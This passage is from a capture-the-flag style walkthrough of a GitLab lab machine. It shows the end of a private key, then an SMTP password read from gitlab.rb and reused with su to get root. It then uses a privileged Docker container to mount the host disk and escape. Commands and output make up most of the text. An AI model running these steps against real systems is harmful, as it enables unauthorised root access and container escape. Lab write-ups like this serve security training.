Wj7eU6BWEKMp3844mD4uZd/k6XGQRKh1Y9UChr2HJcyaoejmlK02\nxKlGD0+OYJvc8gu6YGP9vI8WQL4gyc5C0eoIzJj0qeYAyAWb3sZenYSRTEdtStEM\nD0zh1CaQlZ8VbGtifo4DG4hBITkhmW3J7c+Ne0TXko89XvI4MIVtV5gafoujryjp\nt2EuR+kXCXWgn25rRW1PoixHc1Vd2i09AoIBAQCmy+8mQSnCw9c6GDxDMtnyxqjQ\nrzLgaRFLVZnWDD8/XTilpfTbgQkFHWKO8HzTOQZpo7r/8VgQ5F/ag31Rt7RFKjee\n+KnjxsnIVcAnUvuNndAnb7C7zxWHlwAeknLWYBei3Ir+5rnMUVq7rHhRgGLu3cEU\nWG0giPGkL/IeQ0hsNEz6gqCDkmssBJnLj3QYykzXNsPS7QCsExAu5YvP1XZvBjHd\n5RH74fkBR1ksAIGqRxVk4yR4p12eyhI2yKOzm9z86C9CVwfuo5LK2NMRCfjXdTnO\nukRO4CCUJ2MiSO+GeUhybtsYf4nuFqxCJa4KptiFLQ6EQqHtmpx0aPK6Wgc6\n-----END RSA PRIVATE KEY-----\n"
  }
}
Nothing interesting here..

Token Found

Command used: cat gitlab.rb 
### GitLab email server settings
###! Docs: https://docs.gitlab.com/omnibus/settings/smtp.html
###! **Use smtp instead of sendmail/postfix.**

# gitlab_rails['smtp_enable'] = true
# gitlab_rails['smtp_address'] = "smtp.server"
# gitlab_rails['smtp_port'] = 465
# gitlab_rails['smtp_user_name'] = "smtp user"
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"
# gitlab_rails['smtp_domain'] = "example.com"
# gitlab_rails['smtp_authentication'] = "login"
# gitlab_rails['smtp_enable_starttls_auto'] = true
# gitlab_rails['smtp_tls'] = false
smtp_password looks like a root password!

Privilege Escalation to Root with the Found Credentials

su

"
Password: wW59U!ZKMbG9+*#h

root@gitlab:/opt/backup#
"

Mounting the Filesystem

Checking if the docker has a privilege to access local resources

cat docker-compose.yml
version: '2.4'

services:
  web:
    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
    environment:
      GITLAB_OMNIBUS_CONFIG: |
        external_url 'http://172.19.0.2'
        redis['bind']='127.0.0.1'
        redis['port']=6379
        gitlab_rails['initial_root_password']=File.read('/root_pass')
    networks:
      gitlab:
        ipv4_address: 172.19.0.2
    ports:
      - '5080:80'
      #- '127.0.0.1:5080:80'
      #- '127.0.0.1:50443:443'
      #- '127.0.0.1:5022:22'
    volumes:
      - './srv/gitlab/config:/etc/gitlab'
      - './srv/gitlab/logs:/var/log/gitlab'
      - './srv/gitlab/data:/var/opt/gitlab'
      - './root_pass:/root_pass'
      - '/opt/user:/home/dude/'
    privileged: true
    restart: unless-stopped
    #mem_limit: 1024m

networks:
  gitlab:
    driver: bridge
    ipam:
      config:
        - subnet: 172.19.0.0/16
The privileged: true option in a docker-compose.yml file is used to give a Docker container full access to the host’s resources, such as the host’s devices, system calls, and network stack. - stackoverflow 
lsblk

"
NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT
loop1    7:1    0 55.5M  1 loop 
loop4    7:4    0 31.1M  1 loop 
loop2    7:2    0 71.4M  1 loop 
loop0    7:0    0 55.4M  1 loop 
sda      8:0    0   10G  0 disk 
|-sda2   8:2    0  9.5G  0 part /var/opt/gitlab
|-sda3   8:3    0  512M  0 part [SWAP]
|-sda1   8:1    0    1M  0 part 
loop5    7:5    0 31.1M  1 loop 
loop3    7:3    0 71.3M  1 loop
"
Analyzing the filesystem, we want to know the specific directory to get our root credentials. (/dev/sda2) 
mount /dev/sda2 /mnt
cd /mnt
ls

"
bin   cdrom  etc   lib    lib64   lost+found  mnt  proc  run   snap  sys  usr
boot  dev    home  lib32  libx32  media       opt  root  sbin  srv   tmp  var
"
Once you mount the disk and change current directory to the /mnt filesystem, you are in!

Reference